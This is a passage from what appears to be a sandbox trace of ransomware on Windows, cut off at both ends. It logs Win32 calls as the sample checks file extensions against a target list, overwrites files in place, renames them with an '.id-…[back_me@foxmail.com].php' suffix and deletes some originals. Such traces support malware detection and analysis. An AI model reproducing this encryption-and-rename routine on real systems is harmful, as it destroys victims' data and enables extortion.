lpNumberOfBytesRead=0x366fc38*=0x40000, lpOverlapped=0x0) returned 1 [0052.120] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x366fec8 | out: lpNewFilePointer=0x0) returned 1 [0052.120] WriteFile (in: hFile=0x21c, lpBuffer=0x3fb0020*, nNumberOfBytesToWrite=0xc0104, lpNumberOfBytesWritten=0x366fcb0, lpOverlapped=0x0 | out: lpBuffer=0x3fb0020*, lpNumberOfBytesWritten=0x366fcb0*=0xc0104, lpOverlapped=0x0) returned 1 [0052.400] SetEndOfFile (hFile=0x21c) returned 1 [0052.400] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0x40000) returned 0x432d940 [0052.405] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x366fc7c | out: lpNewFilePointer=0x0) returned 1 [0052.405] WriteFile (in: hFile=0x21c, lpBuffer=0x432d940*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x366fc88, lpOverlapped=0x0 | out: lpBuffer=0x432d940*, lpNumberOfBytesWritten=0x366fc88*=0x40000, lpOverlapped=0x0) returned 1 [0052.405] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xb84a74, lpNewFilePointer=0x0, dwMoveMethod=0x366fc7c | out: lpNewFilePointer=0x0) returned 1 [0052.405] WriteFile (in: hFile=0x21c, lpBuffer=0x432d940*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x366fc88, lpOverlapped=0x0 | out: lpBuffer=0x432d940*, lpNumberOfBytesWritten=0x366fc88*=0x40000, lpOverlapped=0x0) returned 1 [0052.406] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x224df5c, lpNewFilePointer=0x0, dwMoveMethod=0x366fc7c | out: lpNewFilePointer=0x0) returned 1 [0052.406] WriteFile (in: hFile=0x21c, lpBuffer=0x432d940*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x366fc88, lpOverlapped=0x0 | out: lpBuffer=0x432d940*, lpNumberOfBytesWritten=0x366fc88*=0x40000, lpOverlapped=0x0) returned 1 [0052.408] HeapFree (in: hHeap=0xb10000, dwFlags=0x0, lpMem=0x432d940 | out: hHeap=0xb10000) returned 1 [0052.408] CloseHandle (hObject=0x21c) returned 1 [0052.408] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x2020) returned 1 [0052.409] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab") returned 75 [0052.409] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab") returned 75 [0052.409] lstrlenW (lpString=".doc") returned 4 [0052.409] lstrcmpiW (lpString1=".doc", lpString2=".cab") returned 1 [0052.409] lstrlenW (lpString=".docx") returned 5 [0052.409] lstrcmpiW (lpString1=".docx", lpString2="W.cab") returned -1 [0052.409] lstrlenW (lpString=".pdf") returned 4 [0052.409] lstrcmpiW (lpString1=".pdf", lpString2=".cab") returned 1 [0052.409] lstrlenW (lpString=".xls") returned 4 [0052.409] lstrcmpiW (lpString1=".xls", lpString2=".cab") returned 1 [0052.409] lstrlenW (lpString=".xlsx") returned 5 [0052.409] lstrcmpiW (lpString1=".xlsx", lpString2="W.cab") returned -1 [0052.409] lstrlenW (lpString=".ppt") returned 4 [0052.409] lstrcmpiW (lpString1=".ppt", lpString2=".cab") returned 1 [0052.409] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab") returned 75 [0052.409] lstrlenW (lpString=".zip") returned 4 [0052.409] lstrcmpiW (lpString1=".zip", lpString2=".cab") returned 1 [0052.409] lstrlenW (lpString=".rar") returned 4 [0052.409] lstrcmpiW (lpString1=".rar", lpString2=".cab") returned 1 [0052.409] lstrlenW (lpString=".bz2") returned 4 [0052.409] lstrcmpiW (lpString1=".bz2", lpString2=".cab") returned -1 [0052.409] lstrlenW (lpString=".7z") returned 3 [0052.409] lstrcmpiW (lpString1=".7z", lpString2="cab") returned -1 [0052.409] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab") returned 75 [0052.409] lstrlenW (lpString=".dbf") returned 4 [0052.409] lstrcmpiW (lpString1=".dbf", lpString2=".cab") returned 1 [0052.409] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab") returned 75 [0052.409] lstrlenW (lpString=".1cd") returned 4 [0052.409] lstrcmpiW (lpString1=".1cd", lpString2=".cab") returned -1 [0052.409] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab") returned 75 [0052.410] lstrlenW (lpString=".jpg") returned 4 [0052.410] lstrcmpiW (lpString1=".jpg", lpString2=".cab") returned 1 [0052.410] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab") returned 75 [0052.410] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab") returned 75 [0052.410] lstrlenW (lpString=".doc") returned 4 [0052.410] lstrcmpiW (lpString1=".doc", lpString2=".cab") returned 1 [0052.410] lstrlenW (lpString=".docx") returned 5 [0052.410] lstrcmpiW (lpString1=".docx", lpString2="W.cab") returned -1 [0052.410] lstrlenW (lpString=".pdf") returned 4 [0052.410] lstrcmpiW (lpString1=".pdf", lpString2=".cab") returned 1 [0052.410] lstrlenW (lpString=".xls") returned 4 [0052.410] lstrcmpiW (lpString1=".xls", lpString2=".cab") returned 1 [0052.410] lstrlenW (lpString=".xlsx") returned 5 [0052.410] lstrcmpiW (lpString1=".xlsx", lpString2="W.cab") returned -1 [0052.410] lstrlenW (lpString=".ppt") returned 4 [0052.410] lstrcmpiW (lpString1=".ppt", lpString2=".cab") returned 1 [0052.410] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab") returned 75 [0052.410] lstrlenW (lpString=".zip") returned 4 [0052.410] lstrcmpiW (lpString1=".zip", lpString2=".cab") returned 1 [0052.410] lstrlenW (lpString=".rar") returned 4 [0052.410] lstrcmpiW (lpString1=".rar", lpString2=".cab") returned 1 [0052.410] lstrlenW (lpString=".bz2") returned 4 [0052.410] lstrcmpiW (lpString1=".bz2", lpString2=".cab") returned -1 [0052.410] lstrlenW (lpString=".7z") returned 3 [0052.410] lstrcmpiW (lpString1=".7z", lpString2="cab") returned -1 [0052.410] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab") returned 75 [0052.410] lstrlenW (lpString=".dbf") returned 4 [0052.410] lstrcmpiW (lpString1=".dbf", lpString2=".cab") returned 1 [0052.410] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab") returned 75 [0052.411] lstrlenW (lpString=".1cd") returned 4 [0052.411] lstrcmpiW (lpString1=".1cd", lpString2=".cab") returned -1 [0052.411] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab") returned 75 [0052.411] lstrlenW (lpString=".jpg") returned 4 [0052.411] lstrcmpiW (lpString1=".jpg", lpString2=".cab") returned 1 [0052.411] lstrcmpiW (lpString1=".cab", lpString2=".php") returned -1 [0052.411] lstrlenW (lpString="VisiorWW.cab") returned 12 [0052.411] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.cab" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\visiorww.cab"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x21c [0052.411] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0x366ff1c | out: lpFileSize=0x366ff1c*=195011319) returned 1 [0052.411] CloseHandle (hObject=0x21c) returned 1 [0052.411] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.cab" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\visiorww.cab")) returned 0x2020 [0052.411] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.cab.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\visiorww.cab.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0052.412] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.cab" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\visiorww.cab"), lpNewFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.cab.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\visiorww.cab.id-9c354b42.[back_me@foxmail.com].php")) returned 1 [0052.412] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.cab.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\visiorww.cab.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x21c [0052.412] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x366fc6c | out: lpNewFilePointer=0x0) returned 1 [0052.412] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x366fc2c | out: lpNewFilePointer=0x0) returned 1 [0052.412] ReadFile (in: hFile=0x21c, lpBuffer=0x3fb0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x366fc38, lpOverlapped=0x0 | out: lpBuffer=0x3fb0058*, lpNumberOfBytesRead=0x366fc38*=0x40000, lpOverlapped=0x0) returned 1 [0052.420] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x3dfe0fd, lpNewFilePointer=0x0, dwMoveMethod=0x366fc2c | out: lpNewFilePointer=0x0) returned 1 [0052.421] ReadFile (in: hFile=0x21c, lpBuffer=0x3ff0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x366fc38, lpOverlapped=0x0 | out: lpBuffer=0x3ff0058*, lpNumberOfBytesRead=0x366fc38*=0x40000, lpOverlapped=0x0) returned 1 [0052.425] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xfffc0000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x366fc6c | out: lpNewFilePointer=0xffffffff) returned 1 [0052.425] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xb9ba2f7, lpNewFilePointer=0x0, dwMoveMethod=0x366fc2c | out: lpNewFilePointer=0x0) returned 1 [0052.425] ReadFile (in: hFile=0x21c, lpBuffer=0x4030058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x366fc38, lpOverlapped=0x0 | out: lpBuffer=0x4030058*, lpNumberOfBytesRead=0x366fc38*=0x40000, lpOverlapped=0x0) returned 1 [0052.773] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x366fec8 | out: lpNewFilePointer=0x0) returned 1 [0052.773] WriteFile (in: hFile=0x21c, lpBuffer=0x3fb0020*, nNumberOfBytesToWrite=0xc0104, lpNumberOfBytesWritten=0x366fcb0, lpOverlapped=0x0 | out: lpBuffer=0x3fb0020*, lpNumberOfBytesWritten=0x366fcb0*=0xc0104, lpOverlapped=0x0) returned 1 [0052.792] SetEndOfFile (hFile=0x21c) returned 1 [0052.793] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0x40000) returned 0x432d940 [0052.798] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x366fc7c | out: lpNewFilePointer=0x0) returned 1 [0052.798] WriteFile (in: hFile=0x21c, lpBuffer=0x432d940*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x366fc88, lpOverlapped=0x0 | out: lpBuffer=0x432d940*, lpNumberOfBytesWritten=0x366fc88*=0x40000, lpOverlapped=0x0) returned 1 [0052.799] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x3dfe0fd, lpNewFilePointer=0x0, dwMoveMethod=0x366fc7c | out: lpNewFilePointer=0x0) returned 1 [0052.799] WriteFile (in: hFile=0x21c, lpBuffer=0x432d940*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x366fc88, lpOverlapped=0x0 | out: lpBuffer=0x432d940*, lpNumberOfBytesWritten=0x366fc88*=0x40000, lpOverlapped=0x0) returned 1 [0052.801] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xb9ba2f7, lpNewFilePointer=0x0, dwMoveMethod=0x366fc7c | out: lpNewFilePointer=0x0) returned 1 [0052.801] WriteFile (in: hFile=0x21c, lpBuffer=0x432d940*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x366fc88, lpOverlapped=0x0 | out: lpBuffer=0x432d940*, lpNumberOfBytesWritten=0x366fc88*=0x40000, lpOverlapped=0x0) returned 1 [0052.803] HeapFree (in: hHeap=0xb10000, dwFlags=0x0, lpMem=0x432d940 | out: hHeap=0xb10000) returned 1 [0052.803] CloseHandle (hObject=0x21c) returned 1 [0052.803] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.cab.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x2020) returned 1 [0052.803] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.cab") returned 75 [0052.803] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.cab") returned 75 [0052.803] lstrlenW (lpString=".doc") returned 4 [0052.803] lstrcmpiW (lpString1=".doc", lpString2=".cab") returned 1 [0052.803] lstrlenW (lpString=".docx") returned 5 [0052.803] lstrcmpiW (lpString1=".docx", lpString2="W.cab") returned -1 [0052.803] lstrlenW (lpString=".pdf") returned 4 [0052.803] lstrcmpiW (lpString1=".pdf", lpString2=".cab") returned 1 [0052.803] lstrlenW (lpString=".xls") returned 4 [0052.803] lstrcmpiW (lpString1=".xls", lpString2=".cab") returned 1 [0052.804] lstrlenW (lpString=".xlsx") returned 5 [0052.804] lstrcmpiW (lpString1=".xlsx", lpString2="W.cab") returned -1 [0052.804] lstrlenW (lpString=".ppt") returned 4 [0052.804] lstrcmpiW (lpString1=".ppt", lpString2=".cab") returned 1 [0052.804] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.cab") returned 75 [0052.804] lstrlenW (lpString=".zip") returned 4 [0052.804] lstrcmpiW (lpString1=".zip", lpString2=".cab") returned 1 [0052.804] lstrlenW (lpString=".rar") returned 4 [0052.804] lstrcmpiW (lpString1=".rar", lpString2=".cab") returned 1 [0052.804] lstrlenW (lpString=".bz2") returned 4 [0052.804] lstrcmpiW (lpString1=".bz2", lpString2=".cab") returned -1 [0052.804] lstrlenW (lpString=".7z") returned 3 [0052.804] lstrcmpiW (lpString1=".7z", lpString2="cab") returned -1 [0052.804] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.cab") returned 75 [0052.804] lstrlenW (lpString=".dbf") returned 4 [0052.804] lstrcmpiW (lpString1=".dbf", lpString2=".cab") returned 1 [0052.804] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.cab") returned 75 [0052.804] lstrlenW (lpString=".1cd") returned 4 [0052.804] lstrcmpiW (lpString1=".1cd", lpString2=".cab") returned -1 [0052.804] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.cab") returned 75 [0052.804] lstrlenW (lpString=".jpg") returned 4 [0052.804] lstrcmpiW (lpString1=".jpg", lpString2=".cab") returned 1 [0052.804] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.cab") returned 75 [0052.804] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.cab") returned 75 [0052.804] lstrlenW (lpString=".doc") returned 4 [0052.804] lstrcmpiW (lpString1=".doc", lpString2=".cab") returned 1 [0052.804] lstrlenW (lpString=".docx") returned 5 [0052.804] lstrcmpiW (lpString1=".docx", lpString2="W.cab") returned -1 [0052.804] lstrlenW (lpString=".pdf") returned 4 [0052.805] lstrcmpiW (lpString1=".pdf", lpString2=".cab") returned 1 [0052.805] lstrlenW (lpString=".xls") returned 4 [0052.805] lstrcmpiW (lpString1=".xls", lpString2=".cab") returned 1 [0052.805] lstrlenW (lpString=".xlsx") returned 5 [0052.805] lstrcmpiW (lpString1=".xlsx", lpString2="W.cab") returned -1 [0052.805] lstrlenW (lpString=".ppt") returned 4 [0052.805] lstrcmpiW (lpString1=".ppt", lpString2=".cab") returned 1 [0052.805] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.cab") returned 75 [0052.805] lstrlenW (lpString=".zip") returned 4 [0052.805] lstrcmpiW (lpString1=".zip", lpString2=".cab") returned 1 [0052.805] lstrlenW (lpString=".rar") returned 4 [0052.805] lstrcmpiW (lpString1=".rar", lpString2=".cab") returned 1 [0052.805] lstrlenW (lpString=".bz2") returned 4 [0052.805] lstrcmpiW (lpString1=".bz2", lpString2=".cab") returned -1 [0052.805] lstrlenW (lpString=".7z") returned 3 [0052.805] lstrcmpiW (lpString1=".7z", lpString2="cab") returned -1 [0052.805] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.cab") returned 75 [0052.805] lstrlenW (lpString=".dbf") returned 4 [0052.805] lstrcmpiW (lpString1=".dbf", lpString2=".cab") returned 1 [0052.805] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.cab") returned 75 [0052.805] lstrlenW (lpString=".1cd") returned 4 [0052.805] lstrcmpiW (lpString1=".1cd", lpString2=".cab") returned -1 [0052.805] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.cab") returned 75 [0052.805] lstrlenW (lpString=".jpg") returned 4 [0052.805] lstrcmpiW (lpString1=".jpg", lpString2=".cab") returned 1 [0052.805] lstrcmpiW (lpString1=".sys", lpString2=".php") returned 1 [0052.806] lstrlenW (lpString="pagefile.sys") returned 12 [0052.806] CreateFileW (lpFileName="C:\\pagefile.sys" (normalized: "c:\\pagefile.sys"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0052.806] lstrlenW (lpString="C:\\pagefile.sys") returned 15 [0052.806] lstrlenW (lpString="C:\\pagefile.sys") returned 15 [0052.806] lstrlenW (lpString=".doc") returned 4 [0052.806] lstrcmpiW (lpString1=".doc", lpString2=".sys") returned -1 [0052.806] lstrlenW (lpString=".docx") returned 5 [0052.806] lstrcmpiW (lpString1=".docx", lpString2="e.sys") returned -1 [0052.806] lstrlenW (lpString=".pdf") returned 4 [0052.806] lstrcmpiW (lpString1=".pdf", lpString2=".sys") returned -1 [0052.806] lstrlenW (lpString=".xls") returned 4 [0052.806] lstrcmpiW (lpString1=".xls", lpString2=".sys") returned 1 [0052.806] lstrlenW (lpString=".xlsx") returned 5 [0052.806] lstrcmpiW (lpString1=".xlsx", lpString2="e.sys") returned -1 [0052.806] lstrlenW (lpString=".ppt") returned 4 [0052.806] lstrcmpiW (lpString1=".ppt", lpString2=".sys") returned -1 [0052.806] lstrlenW (lpString="C:\\pagefile.sys") returned 15 [0052.806] lstrlenW (lpString=".zip") returned 4 [0052.806] lstrcmpiW (lpString1=".zip", lpString2=".sys") returned 1 [0052.806] lstrlenW (lpString=".rar") returned 4 [0052.806] lstrcmpiW (lpString1=".rar", lpString2=".sys") returned -1 [0052.806] lstrlenW (lpString=".bz2") returned 4 [0052.806] lstrcmpiW (lpString1=".bz2", lpString2=".sys") returned -1 [0052.806] lstrlenW (lpString=".7z") returned 3 [0052.806] lstrcmpiW (lpString1=".7z", lpString2="sys") returned -1 [0052.806] lstrlenW (lpString="C:\\pagefile.sys") returned 15 [0052.806] lstrlenW (lpString=".dbf") returned 4 [0052.807] lstrcmpiW (lpString1=".dbf", lpString2=".sys") returned -1 [0052.807] lstrlenW (lpString="C:\\pagefile.sys") returned 15 [0052.807] lstrlenW (lpString=".1cd") returned 4 [0052.807] lstrcmpiW (lpString1=".1cd", lpString2=".sys") returned -1 [0052.807] lstrlenW (lpString="C:\\pagefile.sys") returned 15 [0052.807] lstrlenW (lpString=".jpg") returned 4 [0052.807] lstrcmpiW (lpString1=".jpg", lpString2=".sys") returned -1 [0052.807] lstrlenW (lpString="C:\\pagefile.sys") returned 15 [0052.807] lstrlenW (lpString="C:\\pagefile.sys") returned 15 [0052.807] lstrlenW (lpString=".doc") returned 4 [0052.807] lstrcmpiW (lpString1=".doc", lpString2=".sys") returned -1 [0052.807] lstrlenW (lpString=".docx") returned 5 [0052.807] lstrcmpiW (lpString1=".docx", lpString2="e.sys") returned -1 [0052.807] lstrlenW (lpString=".pdf") returned 4 [0052.807] lstrcmpiW (lpString1=".pdf", lpString2=".sys") returned -1 [0052.807] lstrlenW (lpString=".xls") returned 4 [0052.807] lstrcmpiW (lpString1=".xls", lpString2=".sys") returned 1 [0052.807] lstrlenW (lpString=".xlsx") returned 5 [0052.807] lstrcmpiW (lpString1=".xlsx", lpString2="e.sys") returned -1 [0052.807] lstrlenW (lpString=".ppt") returned 4 [0052.807] lstrcmpiW (lpString1=".ppt", lpString2=".sys") returned -1 [0052.807] lstrlenW (lpString="C:\\pagefile.sys") returned 15 [0052.807] lstrlenW (lpString=".zip") returned 4 [0052.807] lstrcmpiW (lpString1=".zip", lpString2=".sys") returned 1 [0052.807] lstrlenW (lpString=".rar") returned 4 [0052.807] lstrcmpiW (lpString1=".rar", lpString2=".sys") returned -1 [0052.807] lstrlenW (lpString=".bz2") returned 4 [0052.807] lstrcmpiW (lpString1=".bz2", lpString2=".sys") returned -1 [0052.807] lstrlenW (lpString=".7z") returned 3 [0052.958] lstrcmpiW (lpString1=".7z", lpString2="sys") returned -1 [0052.958] lstrlenW (lpString="C:\\pagefile.sys") returned 15 [0052.958] lstrlenW (lpString=".dbf") returned 4 [0052.958] lstrcmpiW (lpString1=".dbf", lpString2=".sys") returned -1 [0052.958] lstrlenW (lpString="C:\\pagefile.sys") returned 15 [0052.958] lstrlenW (lpString=".1cd") returned 4 [0052.958] lstrcmpiW (lpString1=".1cd", lpString2=".sys") returned -1 [0052.958] lstrlenW (lpString="C:\\pagefile.sys") returned 15 [0052.958] lstrlenW (lpString=".jpg") returned 4 [0052.958] lstrcmpiW (lpString1=".jpg", lpString2=".sys") returned -1 [0052.958] lstrcmpiW (lpString1=".EXE", lpString2=".php") returned -1 [0052.958] lstrlenW (lpString="DWTRIG20.EXE") returned 12 [0052.958] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DWTRIG20.EXE" (normalized: "c:\\program files\\common files\\microsoft shared\\dw\\dwtrig20.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x20c [0053.604] GetFileSizeEx (in: hFile=0x20c, lpFileSize=0x366ff1c | out: lpFileSize=0x366ff1c*=629664) returned 1 [0053.604] CloseHandle (hObject=0x20c) returned 1 [0053.604] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DWTRIG20.EXE" (normalized: "c:\\program files\\common files\\microsoft shared\\dw\\dwtrig20.exe")) returned 0x20 [0053.604] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DWTRIG20.EXE.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\dw\\dwtrig20.exe.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0053.604] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DWTRIG20.EXE" (normalized: "c:\\program files\\common files\\microsoft shared\\dw\\dwtrig20.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x20c [0053.604] SetFilePointerEx (in: hFile=0x20c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x366fec8 | out: lpNewFilePointer=0x0) returned 1 [0053.605] SetFilePointerEx (in: hFile=0x20c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x366fec8 | out: lpNewFilePointer=0x0) returned 1 [0053.605] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DWTRIG20.EXE.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\dw\\dwtrig20.exe.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c0 [0054.511] GetLastError () returned 0x0 [0054.512] ReadFile (in: hFile=0x20c, lpBuffer=0x3fb0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x366fed4, lpOverlapped=0x0 | out: lpBuffer=0x3fb0020*, lpNumberOfBytesRead=0x366fed4*=0x99ba0, lpOverlapped=0x0) returned 1 [0054.527] WriteFile (in: hFile=0x1c0, lpBuffer=0x3fb0020*, nNumberOfBytesToWrite=0x99bb0, lpNumberOfBytesWritten=0x366fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3fb0020*, lpNumberOfBytesWritten=0x366fc9c*=0x99bb0, lpOverlapped=0x0) returned 1 [0054.538] ReadFile (in: hFile=0x20c, lpBuffer=0x3fb0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x366fed4, lpOverlapped=0x0 | out: lpBuffer=0x3fb0020*, lpNumberOfBytesRead=0x366fed4*=0x0, lpOverlapped=0x0) returned 1 [0054.538] WriteFile (in: hFile=0x1c0, lpBuffer=0x3fb0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x366fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3fb0020*, lpNumberOfBytesWritten=0x366fc9c*=0xec, lpOverlapped=0x0) returned 1 [0054.539] SetEndOfFile (hFile=0x1c0) returned 1 [0055.366] CloseHandle (hObject=0x1c0) returned 1 [0055.367] SetFilePointerEx (in: hFile=0x20c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x366fec8 | out: lpNewFilePointer=0x0) returned 1 [0055.367] SetEndOfFile (hFile=0x20c) returned 1 [0055.372] CloseHandle (hObject=0x20c) returned 1 [0055.372] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DWTRIG20.EXE.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x20) returned 1 [0055.372] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DWTRIG20.EXE" (normalized: "c:\\program files\\common files\\microsoft shared\\dw\\dwtrig20.exe")) returned 1 [0055.372] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DWTRIG20.EXE") returned 62 [0055.372] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DWTRIG20.EXE") returned 62 [0055.372] lstrlenW (lpString=".doc") returned 4 [0055.372] lstrcmpiW (lpString1=".doc", lpString2=".EXE") returned -1 [0055.372] lstrlenW (lpString=".docx") returned 5 [0055.372] lstrcmpiW (lpString1=".docx", lpString2="0.EXE") returned -1 [0055.372] lstrlenW (lpString=".pdf") returned 4 [0055.373] lstrcmpiW (lpString1=".pdf", lpString2=".EXE") returned 1 [0055.373] lstrlenW (lpString=".xls") returned 4 [0055.373] lstrcmpiW (lpString1=".xls", 